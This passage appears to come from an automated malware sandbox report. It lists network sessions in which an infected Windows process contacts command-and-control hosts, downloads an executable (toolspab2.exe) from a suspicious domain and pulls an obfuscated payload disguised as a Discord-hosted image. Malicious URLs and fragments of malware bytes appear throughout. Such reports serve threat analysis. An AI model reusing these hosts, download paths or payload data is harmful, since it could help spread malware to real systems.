                                                            Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 19{i+,GO0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            50192.168.2.549846172.67.160.4680C:\Users\user\AppData\Local\Temp\152F.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:24.117980003 CEST14546OUTGET /agrybirdsgamerept HTTP/1.1
                                                            Cache-Control: no-cache
                                                            Connection: Keep-Alive
                                                            Pragma: no-cache
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Host: toptelete.top
                                                            Oct 29, 2021 20:11:24.319390059 CEST14644INHTTP/1.1 200 OK
                                                            Date: Fri, 29 Oct 2021 18:11:24 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            set-cookie: stel_ssid=d2336ac24e8be3916c_13689654553816085746; expires=Sat, 30 Oct 2021 18:11:24 GMT; path=/; samesite=None; secure; HttpOnly
                                                            pragma: no-cache
                                                            cache-control: no-store
                                                            strict-transport-security: max-age=35768000
                                                            access-control-allow-origin: *
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GkVH2aAHmTvphKK6p00o4EMG31YVZwN5gc6uUNub75z4lLpuJRT%2B27COMrQPBiQ0EZxqWBOB%2Bkm7YMjvRHuFYCKy11DiTiGYTjBGjAvb6AbKh64o8EWn2nOerC3Gaagj"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a5e5dbbca9b691f-FRA
                                                            Data Raw: 31 31 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 37 61 63 38 61 71 38 39 65 6e 44 70 48 45 46 4f 49 52 75 4b 31 57 30 76 31 73 46 30 71 43 36 2f 34 62 62 2d 76 31 36 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65
                                                            Data Ascii: 11f2<!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @agrybirdsgamerept</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="agrybirdsgamerept"><meta property="og:image" content="https://telegram.org/img/t_logo.png"><meta property="og:site_name" content="Telegram"><meta property="og:description" content="7ac8aq89enDpHEFOIRuK1W0v1sF0qC6/4bb-v16"><meta property="twitter:title" content="agrybirdsgamerept"><meta prope


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            51192.168.2.54984791.219.236.9780C:\Users\user\AppData\Local\Temp\152F.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6192.168.2.549757185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:11.896691084 CEST1173OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://gurxx.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 347
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:11.975368977 CEST1174INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:11 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 46I:82OOj{CUg%EQAc}yc0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7192.168.2.549758185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:12.100107908 CEST1174OUTGET /downloads/toolspab2.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: privacytoolzforyou-6000.top
                                                            Oct 29, 2021 20:10:12.234684944 CEST1176INHTTP/1.1 200 OK
                                                            Date: Fri, 29 Oct 2021 18:10:12 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                            Last-Modified: Fri, 29 Oct 2021 18:10:01 GMT
                                                            ETag: "54000-5cf81bc649add"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 344064
                                                            Connection: close
                                                            Content-Type: application/octet-stream
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 36 ca 8e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 be 03 00 00 c4 70 02 00 00 00 00 40 c3 01 00 00 10 00 00 00 d0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 74 02 00 04 00 00 31 96 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c1 03 00 50 00 00 00 00 50 73 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 73 02 3c 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 bc 03 00 00 10 00 00 00 be 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 d0 03 00 00 16 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 75 66 75 6c 61 63 e5 02 00 00 00 40 73 02 00 04 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 50 73 02 00 40 00 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 90 73 02 00 24 01 00 00 1c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CtwCtwCtw,ntw,atw,<twJDtwCtv<tw,Btw,Btw,BtwRichCtwPEL6`p@@t1PPs?s<0@.text `.dataio@.lufulac@s@.rsrc?Ps@@@.reloc"s$@B


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8192.168.2.549759185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:15.888807058 CEST1531OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ktkcvjuue.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 249
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:15.965898037 CEST1532INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:15 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9192.168.2.549760185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:16.221129894 CEST1533OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://adlotmsqn.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 200
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:16.300287008 CEST1533INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:16 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2cI:82OI:@_MqBJK,0


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.549804162.159.130.233443C:\Users\user\AppData\Local\Temp\66A4.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-29 18:10:39 UTC0OUTGET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1
                                                            Host: cdn.discordapp.com
                                                            Connection: Keep-Alive
                                                            2021-10-29 18:10:39 UTC0INHTTP/1.1 200 OK
                                                            Date: Fri, 29 Oct 2021 18:10:39 GMT
                                                            Content-Type: image/jpeg
                                                            Content-Length: 1023400
                                                            Connection: close
                                                            CF-Ray: 6a5e5ca4fda75c68-FRA
                                                            Accept-Ranges: bytes
                                                            Age: 31399
                                                            Cache-Control: public, max-age=31536000
                                                            ETag: "4c1a9946a2a50a9bee099f80736b83cb"
                                                            Expires: Sat, 29 Oct 2022 18:10:39 GMT
                                                            Last-Modified: Fri, 29 Oct 2021 09:26:31 GMT
                                                            Vary: Accept-Encoding
                                                            CF-Cache-Status: HIT
                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            Cf-Bgj: h2pri
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            x-goog-generation: 1635499591138366
                                                            x-goog-hash: crc32c=ewuz5A==
                                                            x-goog-hash: md5=TBqZRqKlCpvuCZ+Ac2uDyw==
                                                            x-goog-metageneration: 1
                                                            x-goog-storage-class: STANDARD
                                                            x-goog-stored-content-encoding: identity
                                                            x-goog-stored-content-length: 1023400
                                                            X-GUploader-UploadID: ADPycdvJxlr9khbKEXfSQ9n_bxglLL7dSGVIxF6rk63UtNA6boJtNKCUIT3dV9e0Gr4n6Y4UdNwOh6zGJyRPl1vLRno
                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DlsFNUsyIF0H1rPQgN6ZvTzkO5hepsvpeF3qoIocUsGTuVCz%2B8XSYCYRFaBIhkE0oGmV7BtF5VRoRngAzGN9KbuyRD7gOJVA0OA96u5%2BK8UwT1GV12wLVG6%2Bbwwl%2B1d8v9GSnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            2021-10-29 18:10:39 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                            Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                            2021-10-29 18:10:39 UTC1INData Raw: 4f 71 4a 70 6d 57 44 45 58 4d 2d 45 45 20 4d 4f 20 71 6d 6d 20 4f 20 70 20 4f 20 4f 20 4f 20 6d 20 4f 20 4f 20 4f 20 4a 57 57 20 4a 57 57 20 4f 20 4f 20 71 58 6d 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 44 6d 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 71 4a 58 20 4f 20 4f 20 4f 20 71 6d 20 70 71 20 71 58 44 20 71 6d 20 4f 20 71 58 4f 20 4d 20 4a 4f 57 20 70 70 20 71 58 6d 20 71 20 45 44 20 4a 4f 57 20 70 70 20 58 6d 20 71 4f 6d 20 71 4f 57 20 71 71 57 20 70 4a 20 71 71 4a 20 71 71 6d 20 71 71 71 20 71 4f 70 20 71 71 6d 20 4d 45 20 71 4f 4d 20 70 4a 20 4d 4d 20 4d 45 20 71 71 4f 20 71
                                                            Data Ascii: OqJpmWDEXM-EE MO qmm O p O O O m O O O JWW JWW O O qXm O O O O O O O Dm O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O qJX O O O qm pq qXD qm O qXO M JOW pp qXm q ED JOW pp Xm qOm qOW qqW pJ qqJ qqm qqq qOp qqm ME qOM pJ MM ME qqO q
                                                            2021-10-29 18:10:39 UTC2INData Raw: 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4a 57 20 6d 4f 20 4a 4a 4d 20 71 4f 4d 20 71 71 57 20 57 4f 20 6d 58 20 57 4f 20 57 4f 20 58 6d 20 71 71 6d 20 71 71 45 20 71 6d 44 20 71 6d 70 20 57 4f 20 6d 58 20 71 70 58 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 71 4a 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 45 44 20 57 4f 20 57 6d 20 58 6d 20 71 4a 6d 20
                                                            Data Ascii: O O O O O O O O O O O O O O JW mO JJM qOM qqW WO mX WO WO Xm qqm qqE qmD qmp WO mX qpX Wm Xm qqm qqE qOM qqJ WO qqJ WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO qED WO Wm Xm qJm
                                                            2021-10-29 18:10:39 UTC4INData Raw: 20 57 71 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 71 58 20 57 6d 20 58 6d 20 71 58 20 4d 71 20 70 71 20 70 20 44 6d 20 58 70 20 57 4f 20 57 6d 20 58 6d 20 71 45 58 20 71 71 58 20 71 4f 4d 20 71 71 4a 20 57 4f 20 4a 6d 4f 20 57 71 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 4d 4f 20 6d 4d 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 57 70 20 71 4f 4d 20 71 71 4a 20 71 71 6d 20 70 4f 20 44 6d 20 58 70 20 57 44 20 4a 4d 20 4a 4a 20 71 4f 4d 20 71 71 4a 20 44 4a 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 6d
                                                            Data Ascii: Wq Wm Xm qqX qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX qX Wm Xm qX Mq pq p Dm Xp WO Wm Xm qEX qqX qOM qqJ WO JmO Wq Wm Xm qqX qqE qOM qqJ qMO mM WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm Wp qOM qqJ qqm pO Dm Xp WD JM JJ qOM qqJ DJ mX WO Wm Xm qm
                                                            2021-10-29 18:10:39 UTC5INData Raw: 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71
                                                            Data Ascii: m qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm q
                                                            2021-10-29 18:10:39 UTC6INData Raw: 58 6d 20 71 71 6d 20 57 20 70 71 20 6d 71 20 57 4f 20 6d 58 20 44 44 20 45 4a 20 45 6d 20 71 71 6d 20 71 71 45 20 71 4f 70 20 58 58 20 6d 57 20 6d 58 20 57 4f 20 44 4f 20 4a 6d 44 20 58 45 20 4d 58 20 70 71 20 71 20 57 4f 20 6d 58 20 44 44 20 44 58 20 4a 57 71 20 71 71 6d 20 71 71 45 20 4a 4d 20 71 6d 20 6d 6d 20 6d 58 20 57 4f 20 44 4f 20 71 4a 6d 20 71 4f 4d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 71 6d 6d 20 4a 71 20 6d 4a 20 44 58 20 71 6d 45 20 71 71 6d 20 71 71 45 20 4a 4d 20 4a 20 57 70 20 6d 4d 20 57 4f 20 45 4f 20 6d 4a 20 71 4f 58 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 44 20 6d 45 20 57 4f 20 57 6d 20 4d 6d 20 4a 4f 58 20 4d 70 20 71 70 70 20 71 71 4a 20 57 4f 20 57 6d 20 4d 70 20 4a 4a 20 58 6d 20 71 71 6d 20 71 4a 45 20 4d 45 20 45 4a 20 57
                                                            Data Ascii: Xm qqm W pq mq WO mX DD EJ Em qqm qqE qOp XX mW mX WO DO JmD XE MX pq q WO mX DD DX JWq qqm qqE JM qm mm mX WO DO qJm qOM qqE qOM qJJ qmm Jq mJ DX qmE qqm qqE JM J Wp mM WO EO mJ qOX qqE qOM qJJ JD mE WO Wm Mm JOX Mp qpp qqJ WO Wm Mp JJ Xm qqm qJE ME EJ W
                                                            2021-10-29 18:10:39 UTC8INData Raw: 45 20 4d 45 20 57 57 20 70 70 20 57 6d 20 4a 4f 4f 20 58 4a 20 71 44 6d 20 71 71 44 20 71 4f 4d 20 71 71 58 20 44 57 20 70 4f 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 20 71 70 4d 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 71 20 70 71 20 70 70 20 71 71 6d 20 71 4a 20 71 6d 4a 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 4f 44 20 57 4a 20 4a 70 57 20 58 57 20 71 71 6d 20 71 71 57 20 70 4f 20 4d 57 20 57 4f 20 6d 58 20 57 44 20 71 4d 20 4a 71 4a 20 71 6d 4f 20 71 71 45 20 71 4f 4d 20 71 71 44 20 4a 44 20 57 71 20 57 4f 20 57 6d 20 71 4a 45 20 4a 4d 20 4d 57 20 71 4f 58 20 71 71 4a 20 57 4a 20 70 70 20 57 57 20 70 4d 20 58 4f 20 71 6d 4f 20 71 71 57 20 71 58 44 20 71 71 70 20 57 4f 20 57 6d 20 44 57 20 44 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4d 20 71 6d 70 20 57 4f 20 6d
                                                            Data Ascii: E ME WW pp Wm JOO XJ qDm qqD qOM qqX DW pO WO Wm Mm qJ qpM qOM qqJ Wm Jq pq pp qqm qJ qmJ qOM qqJ Wm JOD WJ JpW XW qqm qqW pO MW WO mX WD qM JqJ qmO qqE qOM qqD JD Wq WO Wm qJE JM MW qOX qqJ WJ pp WW pM XO qmO qqW qXD qqp WO Wm DW D Xm qqm qJE qM qmp WO m
